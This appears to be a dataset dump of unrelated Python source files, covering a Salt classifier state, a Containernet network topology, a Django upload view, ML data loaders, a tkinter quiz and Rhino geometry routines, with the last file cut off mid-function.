text
stringlengths
8
6.05M
def node_classified(name, data={}): ''' Classify node, create inventory level overrides and/or node models :param name: Node FQDN :param data: Node parameters passed to the classifier ''' ret = {'name': name, 'changes': {}, 'result': True, 'comment': 'Node "{0}" is already classified.'.format(name)} if __opts__['test']: ret['result'] = None ret['comment'] = 'Node "{0}" would be classified'.format(name) return ret classification = __salt__['architect.node_classify'](name, data) ret['comment'] = 'Node "{0}" has been classified'.format(name) ret['changes']['Node'] = classification return ret
# Copyright (c) 2015 SONATA-NFV and Paderborn University # ALL RIGHTS RESERVED. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Neither the name of the SONATA-NFV, Paderborn University # nor the names of its contributors may be used to endorse or promote # products derived from this software without specific prior written # permission. # # This work has been performed in the framework of the SONATA project, # funded by the European Commission under Grant number 671517 through # the Horizon 2020 and 5G-PPP programmes. The authors would like to # acknowledge the contributions of their colleagues of the SONATA # partner consortium (www.sonata-nfv.eu). import logging import time from mininet.log import setLogLevel from mininet.net import Containernet from mininet.node import Controller from mininet.cli import CLI from mininet.link import TCLink from mininet.log import info, setLogLevel from emuvim.dcemulator.net import DCNetwork from emuvim.api.rest.rest_api_endpoint import RestApiEndpoint from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint logging.basicConfig(level=logging.INFO) setLogLevel('info') # set Mininet loglevel logging.getLogger('werkzeug').setLevel(logging.DEBUG) logging.getLogger('api.openstack.base').setLevel(logging.DEBUG) logging.getLogger('api.openstack.compute').setLevel(logging.DEBUG) logging.getLogger('api.openstack.keystone').setLevel(logging.DEBUG) logging.getLogger('api.openstack.nova').setLevel(logging.DEBUG) logging.getLogger('api.openstack.neutron').setLevel(logging.DEBUG) logging.getLogger('api.openstack.heat').setLevel(logging.DEBUG) logging.getLogger('api.openstack.heat.parser').setLevel(logging.DEBUG) logging.getLogger('api.openstack.glance').setLevel(logging.DEBUG) logging.getLogger('api.openstack.helper').setLevel(logging.DEBUG) setLogLevel('info') def create_topology(): net = DCNetwork(monitor=False, enable_learning=True) dc1 = net.addDatacenter("dc1") # add OpenStack-like APIs to the emulated DC api1 = OpenstackApiEndpoint("0.0.0.0", 6001) api1.connect_datacenter(dc1) api1.start() api1.connect_dc_network(net) # add the command line interface endpoint to the emulated DC (REST API) rapi1 = RestApiEndpoint("0.0.0.0", 5001) rapi1.connectDCNetwork(net) rapi1.connectDatacenter(dc1) rapi1.start() info('*** Adding docker containers\n') srv = net.addDocker('srv', ip='10.0.0.203', dimage="constancegay/projet_sdci:server") time.sleep(5) GI = net.addDocker('GI', ip='10.0.0.202', dimage="constancegay/projet_sdci:gateway", environment={"loc_ip": "10.0.0.202", "loc_port": "8181", "loc_name": "GI", "rem_ip": "10.0.0.203", "rem_port": "8080", "rem_name": "srv"}) time.sleep(5) mon = net.addDocker('mon', ip='10.0.0.204', dimage="constancegay/projet_sdci:mon") # GFs gf1 = net.addDocker('GF1', ip='10.0.0.201', dimage="constancegay/projet_sdci:gateway", environment={"loc_ip": "10.0.0.201", "loc_port": "8282", "loc_name": "GF1", "rem_ip": "10.0.0.202", "rem_port": "8181", "rem_name": "GI"}) gf2 = net.addDocker('GF2', ip='10.0.0.208', dimage="constancegay/projet_sdci:gateway", environment={"loc_ip": "10.0.0.208", "loc_port": "9004", "loc_name": "GF2", "rem_ip": "10.0.0.202", "rem_port": "8181", "rem_name": "GI"}) gf3 = net.addDocker('GF3', ip='10.0.0.212', dimage="constancegay/projet_sdci:gateway", environment={"loc_ip": "10.0.0.212", "loc_port": "9008", "loc_name": "GF3", "rem_ip": "10.0.0.202", "rem_port": "8181", "rem_name": "GI"}) time.sleep(5) # ZONE 1 devices dev1 = net.addDocker('dev1', ip='10.0.0.205', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.205", "loc_port": "9001", "loc_name": "dev1", "rem_ip": "10.0.0.201", "rem_port": "8282", "rem_name": "GF1"}) dev2 = net.addDocker('dev2', ip='10.0.0.206', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.206", "loc_port": "9002", "loc_name": "dev2", "rem_ip": "10.0.0.201", "rem_port": "8282", "rem_name": "GF1"}) dev3 = net.addDocker('dev3', ip='10.0.0.207', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.207", "loc_port": "9003", "loc_name": "dev3", "rem_ip": "10.0.0.201", "rem_port": "8282", "rem_name": "GF1"}) # ZONE 2 devices dev4 = net.addDocker('dev4', ip='10.0.0.209', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.209", "loc_port": "9005", "loc_name": "dev4", "rem_ip": "10.0.0.208", "rem_port": "9004", "rem_name": "GF2"}) dev5 = net.addDocker('dev5', ip='10.0.0.210', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.210", "loc_port": "9006", "loc_name": "dev5", "rem_ip": "10.0.0.208", "rem_port": "9004", "rem_name": "GF2"}) dev6 = net.addDocker('dev6', ip='10.0.0.211', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.211", "loc_port": "9007", "loc_name": "dev6", "rem_ip": "10.0.0.208", "rem_port": "9004", "rem_name": "GF2"}) # ZONE 3 devices dev7 = net.addDocker('dev7', ip='10.0.0.213', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.213", "loc_port": "9009", "loc_name": "dev7", "rem_ip": "10.0.0.212", "rem_port": "9008", "rem_name": "GF3"}) dev8 = net.addDocker('dev8', ip='10.0.0.214', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.214", "loc_port": "9010", "loc_name": "dev8", "rem_ip": "10.0.0.212", "rem_port": "9008", "rem_name": "GF3"}) dev9 = net.addDocker('dev9', ip='10.0.0.215', dimage="constancegay/projet_sdci:dev", environment={"loc_ip": "10.0.0.215", "loc_port": "9011", "loc_name": "dev9", "rem_ip": "10.0.0.212", "rem_port": "9008", "rem_name": "GF3"}) info('*** Adding switches\n') s1 = net.addSwitch('s1') s2 = net.addSwitch('s2') s3 = net.addSwitch('s3') s4 = net.addSwitch('s4') s5 = net.addSwitch('s5') info('*** Creating links\n') net.addLink(s1, srv) net.addLink(s1, GI) net.addLink(s1, mon) net.addLink(s2, s1) net.addLink(s2, dc1) net.addLink(s3, s2) net.addLink(s4, s2) net.addLink(s5, s2) # ZONE 1 net.addLink(s3, gf1) net.addLink(s3, dev1) net.addLink(s3, dev2) net.addLink(s3, dev3) # ZONE 2 net.addLink(s4, gf2) net.addLink(s4, dev4) net.addLink(s4, dev5) net.addLink(s4, dev6) # ZONE 3 net.addLink(s5, gf3) net.addLink(s5, dev7) net.addLink(s5, dev8) net.addLink(s5, dev9) info('*** Starting network\n') net.start() info('*** Testing connectivity\n') net.ping([srv, dev1]) info('*** Running CLI\n') CLI(net) info('*** Stopping network') net.stop() def main(): create_topology() if __name__ == '__main__': main()
# coding:utf-8 from __future__ import absolute_import, unicode_literals __author__ = "golden" __date__ = '2018/5/29' import asyncio async def loop1(): while True: print('loop1') await asyncio.sleep(1) async def loop2(): while True: print('loop2') await asyncio.sleep(1) loop = asyncio.get_event_loop() asyncio.ensure_future(loop1()) asyncio.ensure_future(loop2()) loop.run_forever()
# -*- coding: utf-8 -*- from django.shortcuts import render from django.template import RequestContext from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse from uploader.myapp.models import Document from uploader.myapp.forms import DocumentForm def list(request): # upload file if request.method == 'POST': form = DocumentForm(request.POST, request.FILES) if form.is_valid(): newdoc = Document(docfile=request.FILES['docfile']) newdoc.save() # redirect to list return HttpResponseRedirect(reverse('list')) else: form = DocumentForm() # empty form # load documents documents = Document.objects.all() # render list page and form return render( request, 'list.html', {'documents': documents, 'form': form} )
import os from NeuralGraph.processing import pickle_to_input, lst_to_out from NeuralGraph.util import Timer from sklearn.model_selection import train_test_split from collections import Counter from NeuralGraph.preprocessing import padaxis import torch as T def str_key(a): ka = a.strip().split('_')[2] return ka def pickle_out(start=0, amount=5, test_size=0.2, random_state=0,save_dir='/home/ubuntu/wangzhongxu/gcnn2/NGFP/dataset/pickle'): input_lst = [] out = [] with Timer() as t: dir_lst = os.listdir(save_dir) dir_lst.sort(key=str_key) for file in dir_lst[start:start+amount]: file = '{}/{}'.format(save_dir, file) input_lst += pickle_to_input(file) # find max values max_nodes, max_degree = [], [] for input in list(zip(*input_lst))[4]: max_nodes.append(input.shape[0]) max_degree.append(input.shape[1]) # # print(max(max_nodes)) # # print(max(max_degree)) # print(Counter([i.numpy().tolist()[0] for i in list(zip(*input_lst))[5]])) # tuple to list input_lst = [list(input) for input in input_lst] # print(type(input_lst[0][3])) # padaxis col_3 col_4 for i in range(len(input_lst)): input_lst[i][3] = T.from_numpy(padaxis(input_lst[i][3], max(max_nodes), axis=0)) input_lst[i][4] = T.from_numpy(padaxis(input_lst[i][4], max(max_nodes), axis=0, pad_value=-1)) input_lst[i][4] = T.from_numpy(padaxis(input_lst[i][4], max(max_degree), axis=1, pad_value=-1)) # print(type(input_lst[0][3])) # max_nodes, max_degree = [], [] # for input in list(zip(*input_lst))[4]: # max_nodes.append(input.shape[0]) # max_degree.append(input.shape[1]) # print(Counter(max_nodes)) # print(Counter(max_degree)) # split train test set tmp_lst = [0 for _ in range(len(input_lst))] train_set, valid_set, _, _ = train_test_split(input_lst, tmp_lst, test_size=test_size, random_state=random_state) # print(type(train_set)) # print(type(train_set[0][0])) train_out, valid_out = lst_to_out(train_set), lst_to_out(valid_set) # print('\ntrain data amount: {} datas'.format(len(train_out[0]))) # print('train_out length: {}\ntrain_out ctx shape: {}'.format(len(train_out), train_out[4].shape)) # print('\nvalid data amount: {} datas'.format(len(valid_out[0]))) # print('valid_out length: {}\nvalid_out ctx shape: {}'.format(len(valid_out), valid_out[4].shape)) return train_out, valid_out if __name__ == '__main__': pickle_out(amount=5, save_dir='/home/ubuntu/wangzhongxu/gcnn2/NGFP/dataset/pickle') # amount=1, spent time: 0.45s, MEM usage rate: 1.1% # amount=5, spent time: 2.13s, MEM usage rate: 4.5% # amount=10, spent time: 9.93s, MEM usage rate: 12.5%
#!/usr/bin/env python # coding=utf-8 from torch.utils.data import Dataset import skimage.io as io import torch class MNISTDataset(Dataset): #mnist手写体数据集 def __init__(self,img_list_path,dataset_root_path="/dataset/human_attribute/",transform=None): self.img_list_path = img_list_path self.transform = transform self.img_label_dic = {"img_path":[],"label":[]} self.dataset_root_path = dataset_root_path fr = open(self.img_list_path,"r") for line in fr: strings = line.split(" ") strings[1] = strings[1].split("\n")[0] self.img_label_dic["img_path"].append(strings[0]) self.img_label_dic["label"].append(strings[1]) def __len__(self): if(len(self.img_label_dic["img_path"]) != len(self.img_label_dic["label"])): return 0 return len(self.img_label_dic["img_path"]) def __getitem__(self,idx): img_path = os.path.join(self.dataset_root_path,self.img_label_dic["img_path"][idx]) img = io.imread(img_path) label = int(self.img_label_dic["label"][idx]) #切记这一步要把label转换成int 否则后面不能转换成tensor if self.transform: img = self.transform(img) label = torch.LongTensor([label]) #要求必须是longtensor 不能是floattensor return img,label.squeeze()
# 找到分类讨论的关键 # 此题首先就是按照取模3为0,1,2分类 # 0具有特殊性,可以作为分类的大前提 class Solution: def stoneGameIX(self, stones: List[int]) -> bool: s = [0, 0, 0] for i in stones: s[i%3] += 1 if s[0] % 2 == 0: return s[1] > 0 and s[2] > 0 else: return abs(s[1] - s[2]) > 2
#Modules from tkinter import* from tkinter import ttk #---------------------------------------- class MyQuiz(): def __init__(self,root): self.Start = Frame(root) self.Start.grid() self.Title = Label(self.Start, text="English Quiz", font = 30) self.Title.grid(columnspan = 2) self.StartQuiz = ttk.Button(self.Start, text = "Start Quiz", command = NextPage) self.StartQuiz.grid(column = 1) class StartQuiz(): def __init__(self,root): self.StartQuiz = Frame(root) Quiz.Start.grid_forget() self.StartQuiz.grid() #Radiobutton self.v = StringVar(root, "1") values = {"Level 1" : "1", "Level 2" : "2", "Level 3" : "3"} self.ChooseLevel = Label(self.StartQuiz, text = "Choose Level", bg = "black", fg = "white", font = 30) self.ChooseLevel.grid(columnspan = 3) for (text, value) in values.items(): Radiobutton(self.StartQuiz, text = text, variable = self.v, value = value, indicator = 0,background = "light blue").grid() self.NextBut = ttk.Button(self.StartQuiz, text = "Next", command = lambda: NextPages(self.v)) self.NextBut.grid(row = 3) def NextPage(): global LevelChoosing LevelChoosing = StartQuiz(root) #Difficulty 1 ----------------------------------------------------------------------------------------- class Level1: def __init__(self, root): LevelChoosing.StartQuiz.grid_forget() self.Level1 = Frame(root) self.Level1.grid() self.Title = Label(self.Level1, text = "Level 2") self.Title.grid(columnspan = 2, row = 0,) self.Question = Label(self.Level1) self.Question.grid(column = 1, row = 2) self.QEntry = Entry(self.Level1) self.QEntry.grid(row = 3, column = 2) def NextQuestion(): pass self.Next_But = ttk.Button(self.Level1, text = "Next", command = NextQuestion) self.Next_But.grid(row = 4, column = 0) Q_Entry = self.QEntry.get() Q_List = ["How many weeks are there in a year?","If John had 50 candies and he ate 40, what does he have?", "Can you count how many days on your finger is in a leap year?","If Brook Book booked bookings twice", "how many books booking did book book?","What does OOP stand for?"] Q_Answer = ["53", "Diabetes", "No, because you only have 10 fingers", "Twice", "Object Oriented Programming"] def Submit_Ans(): if Q_Entry == "": self.Question.config(text = "Correct!") self.Next_But.grid() pass else: self.Question.config(text = "Bad!") self.Next_But.grid() pass self.Submit_But = ttk.Button(self.Level1, text= "Submit", command = Submit_Ans) self.Submit_But.grid(row = 4, column = 1) lvl1 = None def NextPages(value_chosen): if value_chosen.get() == "1": lvl1 = Level1(root) else: pass #runs when the name of the program is recognized as True if __name__ == "__main__": root = Tk() root.title("English Quiz") Quiz = MyQuiz(root) root.geometry("250x200+420+160")
import Rhino as rc import math import random import Rhino.Geometry as rg import scriptcontext as sc import rhinoscriptsyntax as rs import util from itertools import combinations import clr; clr.AddReference("Grasshopper") import Grasshopper as gh #Computational Geometry def PoissonDiscSampling(r, width, height): """Generates points within the domains inputs: r - Minimum distance between samples width - highest x domain height - highest y domain returns: rc.Geometry.Point3d [list] """ def get_cell_coords(pt): """Get the coordinates of the cell that pt = (x,y) falls in.""" return int(pt[0] // a), int(pt[1] // a) def get_neighbours(coords): """Return the indexes of points in cells neighbouring cell at coords. For the cell at coords = (x,y), return the indexes of points in the cells with neighbouring coordinates illustrated below: ie those cells that could contain points closer than r. ooo ooooo ooXoo ooooo ooo """ dxdy = [(-1,-2),(0,-2),(1,-2),(-2,-1),(-1,-1),(0,-1),(1,-1),(2,-1), (-2,0),(-1,0),(1,0),(2,0),(-2,1),(-1,1),(0,1),(1,1),(2,1), (-1,2),(0,2),(1,2),(0,0)] neighbours = [] for dx, dy in dxdy: neighbour_coords = coords[0] + dx, coords[1] + dy if not (0 <= neighbour_coords[0] < nx and 0 <= neighbour_coords[1] < ny): # We're off the grid: no neighbours here. continue neighbour_cell = cells[neighbour_coords] if neighbour_cell is not None: # This cell is occupied: store this index of the contained point. neighbours.append(neighbour_cell) return neighbours def point_valid(pt): """Is pt a valid point to emit as a sample? It must be no closer than r from any other point: check the cells in its immediate neighbourhood. """ cell_coords = get_cell_coords(pt) for idx in get_neighbours(cell_coords): nearby_pt = samples[idx] # Squared distance between or candidate point, pt, and this nearby_pt. distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2 if distance2 < r**2: # The points are too close, so pt is not a candidate. return False # All points tested: if we're here, pt is valid return True def get_point(k, refpt): """Try to find a candidate point relative to refpt to emit in the sample. We draw up to k points from the annulus of inner radius r, outer radius 2r around the reference point, refpt. If none of them are suitable (because they're too close to existing points in the sample), return False. Otherwise, return the pt. """ i = 0 while i < k: rho, theta = random.uniform(r, 2*r), random.uniform(0, 2*math.pi) pt = refpt[0] + rho*math.cos(theta), refpt[1] + rho*math.sin(theta) if not (0 <= pt[0] < width and 0 <= pt[1] < height): # This point falls outside the domain, so try again. continue if point_valid(pt): return pt i += 1 # We failed to find a suitable point in the vicinity of refpt. return False # Choose up to k points around each reference point as candidates for a new # sample point k = 30 # Cell side length a = r/math.sqrt(2) # Number of cells in the x- and y-directions of the grid nx, ny = int(width / a) + 1, int(height / a) + 1 # A list of coordinates in the grid of cells coords_list = [(ix, iy) for ix in range(nx) for iy in range(ny)] # Initilalize the dictionary of cells: each key is a cell's coordinates, the # corresponding value is the index of that cell's point's coordinates in the # samples list (or None if the cell is empty). cells = {coords: None for coords in coords_list} # Pick a random point to start with. pt = (random.uniform(0, width), random.uniform(0, height)) samples = [pt] # Our first sample is indexed at 0 in the samples list... cells[get_cell_coords(pt)] = 0 # ... and it is active, in the sense that we're going to look for more points # in its neighbourhood. active = [0] nsamples = 1 # As long as there are points in the active list, keep trying to find samples. while active: # choose a random "reference" point from the active list. idx = random.choice(active) refpt = samples[idx] # Try to pick a new point relative to the reference point. pt = get_point(k, refpt) if pt: # Point pt is valid: add it to the samples list and mark it as active samples.append(pt) nsamples += 1 active.append(len(samples)-1) cells[get_cell_coords(pt)] = len(samples) - 1 else: # We had to give up looking for valid points near refpt, so remove it # from the list of "active" points. active.remove(idx) rcPts = [] for sample in samples: rcPts.append(rc.Geometry.Point3d(sample[0], sample[1], 0)) return rcPts class AStar(): """ Setup the list of nodes using __init__ then call AStarPathFinder(start, end) to return a path of nodes. example: searchNetwork = AStar(srfs) start = searchNetwork.GetNodeClosestToPt(rg.Point3d(0,0,0)) end = searchNetwork.GetNodeClosestToPt(rg.Point3d(50,50,0)) result, path = searchNetwork.AStarPathFinder(start, end) """ def __init__(self, srfs): """ parameter: srfs [list]: triangular srfs, not joined """ self.nodes = [] self.start = None self.end = None #Create Nodes for srf in srfs: srfPts = srf.Brep.Vertices thisSrfNodes = [] for srfPt in srfPts: pt = rg.Point3d(srfPt.Location.X, srfPt.Location.Y, 0) node0 = None for node in self.nodes: if node.pos == pt: node0 = node break if node0 is None: node0 = self.Node(pt) thisSrfNodes.append(node0) #Setup node neighbors for thisSrfNode in thisSrfNodes: for otherNode in thisSrfNodes: if thisSrfNode is otherNode: continue if otherNode not in thisSrfNode.neighbors: thisSrfNode.neighbors.append(otherNode) if thisSrfNode not in self.nodes: self.nodes.append(thisSrfNode) def GetNodeClosestToPt(self, pt): """ parameters: pt (point): point to find node closest to returns: node: node closest to pt """ closestDist = None closestNode = None for node in self.nodes: d = rs.Distance(pt, node.pos) if d < closestDist or closestDist is None: closestDist = d closestNode = node return closestNode def AStarPathFinder(self, start, end): """ paramters: start (node): end (node): returns: Bool (success or failure) list (nodes visited) (use the .pos to get the rhino point) """ openSet = [start] closedSet = [] path = [] searching = True while searching: if sc.escape_test(True): return if len(openSet) > 0: #Choose tile with lowest f score lowestTile = openSet[0] for tile in openSet: if tile is lowestTile: continue if tile.f < lowestTile.f or lowestTile is None: lowestTile = tile current = lowestTile path = [] temp = current path.append(temp) while temp.previous: path.append(temp.previous) temp = temp.previous #Check if at the end if current is end: searching = False break #Move current tile from open to closed set openSet.remove(current) closedSet.append(current) #Check all the neighbors for neighbor in current.neighbors: #if neighbor.type == 0: continue #Use this if nodes are blocked if neighbor not in closedSet: tempG = current.g + rs.Distance(current.pos, neighbor.pos) #Is this a better path? if neighbor not in openSet: openSet.append(neighbor) elif tempG >= neighbor.g: #It is not a better path continue neighbor.previous = current neighbor.g = tempG neighbor.h = rs.Distance(current.pos, end.pos) neighbor.f = neighbor.g + neighbor.h else: #print "No Solution" return False, None return True, path class Node(): def __init__(self, pt): self.pos = pt self.neighbors = [] self.previous = None self.f = 0 self.g = 0 self.h = 0 self.type = None class AStarMesh(): """ Setup the list of nodes using __init__ then call AStarPathFinder(start, end) to return a path of nodes. example: searchNetwork = geo.AStarMesh(mesh, sourceIndex, targetIndex) result, path = searchNetwork.AStarPathFinder() """ def __init__(self, mesh, start, end): """ parameter: srfs [list]: triangular srfs, not joined """ self.nodes = [] for i, v in enumerate(mesh.Vertices): self.nodes.append(self.Node(v)) for i, v in enumerate(mesh.Vertices): indices = mesh.Vertices.GetConnectedVertices(i) for index in indices: self.nodes[i].neighbors.append(self.nodes[index]) self.start = self.nodes[start] self.end = self.nodes[end] if False: #Create Nodes for srf in srfs: srfPts = srf.Brep.Vertices thisSrfNodes = [] for srfPt in srfPts: pt = rg.Point3d(srfPt.Location.X, srfPt.Location.Y, 0) node0 = None for node in self.nodes: if node.pos == pt: node0 = node break if node0 is None: node0 = self.Node(pt) thisSrfNodes.append(node0) #Setup node neighbors for thisSrfNode in thisSrfNodes: for otherNode in thisSrfNodes: if thisSrfNode is otherNode: continue if otherNode not in thisSrfNode.neighbors: thisSrfNode.neighbors.append(otherNode) if thisSrfNode not in self.nodes: self.nodes.append(thisSrfNode) def GetNodeClosestToPt(self, pt): """ parameters: pt (point): point to find node closest to returns: node: node closest to pt """ closestDist = None closestNode = None for node in self.nodes: d = rs.Distance(pt, node.pos) if d < closestDist or closestDist is None: closestDist = d closestNode = node return closestNode def AStarPathFinder(self): """ paramters: start (node): end (node): returns: Bool (success or failure) list (nodes visited) (use the .pos to get the rhino point) """ openSet = [self.start] closedSet = [] path = [] searching = True while searching: if sc.escape_test(True): return if len(openSet) > 0: #Choose tile with lowest f score lowestTile = openSet[0] for tile in openSet: if tile is lowestTile: continue if tile.f < lowestTile.f or lowestTile is None: lowestTile = tile current = lowestTile path = [] temp = current path.append(temp) while temp.previous: path.append(temp.previous) temp = temp.previous #Check if at the end if current is self.end: searching = False break #Move current tile from open to closed set openSet.remove(current) closedSet.append(current) #Check all the neighbors for neighbor in current.neighbors: #if neighbor.type == 0: continue #Use this if nodes are blocked if neighbor not in closedSet: tempG = current.g + rs.Distance(current.pos, neighbor.pos) #Is this a better path? if neighbor not in openSet: openSet.append(neighbor) elif tempG >= neighbor.g: #It is not a better path continue neighbor.previous = current neighbor.g = tempG neighbor.h = rs.Distance(current.pos, self.end.pos) neighbor.f = neighbor.g + neighbor.h else: #print "No Solution" return False, None return True, path class Node(): def __init__(self, pt): self.pos = rg.Point3d(pt) self.neighbors = [] self.previous = None self.f = 0 self.g = 0 self.h = 0 self.type = None def Delaunay2d(pts): """ Delaunay Triangulation parameters: pts [list] return: PolylineCurve [list]: in counter-clockwise orientation """ triangles = [] set = list(combinations(pts,3)) for tuple in set: c1 = tuple[0] c2 = tuple[1] c3 = tuple[2] if (c1[0]-c2[0])*(c3[1]-c2[1])-(c1[1]-c2[1])*(c3[0]-c2[0]) != 0: circle = rg.Circle(c1,c2,c3) center = circle.Center circle = circle.ToNurbsCurve() delaunay = 0 for point in pts: if circle.Contains(point) == rg.PointContainment.Inside: delaunay = 1 continue if delaunay == 0: crv = rg.PolylineCurve([c1,c2,c3,c1]) if crv.ClosedCurveOrientation() == rg.CurveOrientation.Clockwise: crv.Reverse() triangles.append(crv) return triangles def Delaunay2dPts(pts): """ Delaunay Triangulation parameters: pts [list] return: Pts [list]: in counter-clockwise orientation """ triangles = [] set = list(combinations(pts,3)) for tuple in set: c1 = tuple[0] c2 = tuple[1] c3 = tuple[2] if (c1[0]-c2[0])*(c3[1]-c2[1])-(c1[1]-c2[1])*(c3[0]-c2[0]) != 0: circle = rg.Circle(c1,c2,c3) circle = circle.ToNurbsCurve() delaunay = 0 for point in pts: if circle.Contains(point) == rg.PointContainment.Inside: delaunay = 1 continue if delaunay == 0: if False: c1t = circle.ClosestPoint(c1)[1] c2t = circle.ClosestPoint(c2)[1] c3t = circle.ClosestPoint(c3)[1] group = [[c1t, c1], [c2t, c2], [c3t, c3]] group.sort() triangles.append([group[0][1],group[1][1],group[2][1]]) triangles.append([c1, c2, c3]) return triangles def DelaunayMesh(pts, plane): """ Delaunay Triangulation to a mesh parameters: pts [list] plane: Plane to project to return: Mesh """ mesh = rg.Mesh() ptsList = rc.Collections.Point3dList(pts) #Transform to worldXY xform = rg.Transform.PlaneToPlane(plane, rg.Plane.WorldXY) ptsList.Transform(xform) #Add pts to mesh for pt in ptsList: mesh.Vertices.Add(pt) #Project to plane ptsList.SetAllZ(0) #Find delaunay allPts = Delaunay2dPts(ptsList) #Return to correct Z returnToZPts = [] for tri in allPts: mesh.Faces.AddFace(ptsList.ClosestIndex(tri[0]), ptsList.ClosestIndex(tri[1]), ptsList.ClosestIndex(tri[2])) #Return to original space returnXform = rg.Transform.PlaneToPlane(rg.Plane.WorldXY, plane) mesh.Transform(returnXform) mesh.UnifyNormals() mesh.RebuildNormals() return mesh def Voronoi2D(pts, bbCorners = None): """ Calculates 2d voronoi using Grasshopper code parameters: pts (rg.Point3d)[list] bbCorners (rg.Point3d)[list]: 4 points for boundary returns: rg.PolylineCurve [list]: Closed region """ if bbCorners is None: # Create a boundingbox and get its corners bb = rc.Geometry.BoundingBox(pts) d = bb.Diagonal dl = d.Length f = dl/15 bb.Inflate(f,f,f) bbCorners = bb.GetCorners() # Create a list of outline nodes using the BB outline = gh.Kernel.Geometry.Node2List() for p in bbCorners: n = gh.Kernel.Geometry.Node2(p.X,p.Y) outline.Append(n) # Create a list of nodes nodes = gh.Kernel.Geometry.Node2List() for p in pts: n = gh.Kernel.Geometry.Node2(p.X,p.Y) nodes.Append(n) # Calculate the delaunay triangulation delaunay = gh.Kernel.Geometry.Delaunay.Solver.Solve_Connectivity(nodes,0.1,False) # Calculate the voronoi diagram voronoi = gh.Kernel.Geometry.Voronoi.Solver.Solve_Connectivity(nodes,delaunay,outline) # Get polylines from the voronoi cells and return them to GH polylines = [] for c in voronoi: pl = c.ToPolyline() polylines.append(pl.ToPolylineCurve()) return polylines class ConvexHull(): """ Code modified from https://startupnextdoor.com/computing-convex-hull-in-python/ initialize then use get_hull_points or get_polyline paramters: allPts (pts [point]): list of pts """ def __init__(self, allPts): self._hull_points = [] self._points = allPts self.compute_hull() def _get_orientation(self, origin, p1, p2): ''' Returns the orientation of the Point p1 with regards to Point p2 using origin. Negative if p1 is clockwise of p2. :param p1: :param p2: :return: integer ''' difference = ( ((p2.X - origin.X) * (p1.Y - origin.Y)) - ((p1.X - origin.X) * (p2.Y - origin.Y)) ) return difference def compute_hull(self): ''' Computes the points that make up the convex hull. :return: ''' points = self._points # get leftmost point start = points[0] min_x = start.X for p in points[1:]: if p.X < min_x: min_x = p.X start = p point = start self._hull_points.append(start) far_point = None while far_point is not start: # get the first point (initial max) to use to compare with others p1 = None for p in points: if p is point: continue else: p1 = p break far_point = p1 for p2 in points: # ensure we aren't comparing to self or pivot point if p2 is point or p2 is p1: continue else: direction = self._get_orientation(point, far_point, p2) if direction > 0: far_point = p2 self._hull_points.append(far_point) point = far_point def get_hull_points(self): """ returns: pts [list] """ if self._points and not self._hull_points: self.compute_hull() return self._hull_points def get_polyline(self): """ returns: polyline """ return rc.Geometry.Polyline(self._hull_points) def minBoundingBox(crv): """Returns the minimal 2d bounding box of a curve or surface. Parameters: crv (curve) = planar curve or surface Returns: polylineCurve = min polyline based on area """ #Get control points P = rs.CurveEditPoints(crv) p = [] for i in range(0, len(P)-1): p.append(P[i]) #get The convex hull hull = ConvexHull(p) convexHull = hull.get_polyline() minArea = None minBoundary = None plane = crv.TryGetPlane()[1] normal = plane.Normal #For each edge for i in range(convexHull.SegmentCount): edge = convexHull.SegmentAt(i) segVec = edge.PointAt(0) - edge.PointAt(1) yVec = rs.VectorCrossProduct(normal, segVec) plane = rg.Plane(rs.coerce3dpoint((0,0,0)), segVec, yVec) bbPts = rs.BoundingBox(crv, view_or_plane = plane) newPts = bbPts[:4] newPts.append(bbPts[0]) pline = rg.PolylineCurve(newPts) am = rg.AreaMassProperties.Compute(pline) area = am.Area if area < minArea or minArea is None: minArea = area minBoundary = pline return minBoundary #Pts def MidPoint(pt1, pt2): """ pointBetweenPoints(pt1, pt2) input: pt1 = rc point pt2 = rc point return: new rc point """ x = util.Remap(.5, 0, 1, min(pt1.X, pt2.X), max(pt1.X, pt2.X)) y = util.Remap(.5, 0, 1, min(pt1.Y, pt2.Y), max(pt1.Y, pt2.Y)) z = util.Remap(.5, 0, 1, min(pt1.Z, pt2.Z), max(pt1.Z, pt2.Z)) return rc.Geometry.Point3d(x,y,z) def PointBetweenPoints(pt1, pt2, t = .5): """ pointBetweenPoints(pt1, pt2, t = .5) input: pt1 = rc point pt2 = rc point t = normalized pt between pt1 and pt2 return: new rc point """ line = rg.Line(pt1, pt2) return line.PointAt(t) def RandomPoint(x0 = 0, x1 = 100, y0 = 0, y1 = 100, z0 = 0, z1 = 100): """Randomly creates point between x0->x1, y0->y1, and z0->z1domains """ return rg.Point3d(random.uniform(x0,x1), random.uniform(y0,y1),random.uniform(z0,z1)) def RemoveDuplicatePts(points): # Create a dictionary to keep track of the Id pointDict = {} ptList = [] for pt in points: pt3d = rs.coerce3dpoint(pt) pointDict[pt3d] = pt ptList.append(pt3d) #sortList ptList.sort() ptLast = ptList[-1] tol = sc.doc.ModelAbsoluteTolerance for i in range(len(ptList)-2,-1,-1): if (abs(ptList[i][0]-ptLast[0]) < tol) and (abs(ptList[i][1]-ptLast[1])) < tol and (abs(ptList[i][2]-ptLast[2]) < tol): del ptList[i] else: ptLast = ptList[i] #find the the ids with the new list outputList = [] for pt in ptList: ptId = pointDict[pt] outputList.append(ptId) return outputList def CentroidOfPoints(pts): centerPt = rg.Point3d(0,0,0) for pt in pts: centerPt += pt return centerPt/len(pts) #Vectors def VectorDisplay(point, vector, accel): endPt = rc.Geometry.Point3d.Add(point, vector) accelEndPt = rc.Geometry.Point3d.Add(endPt, accel) line1 = rc.Geometry.Line(point, endPt) line2 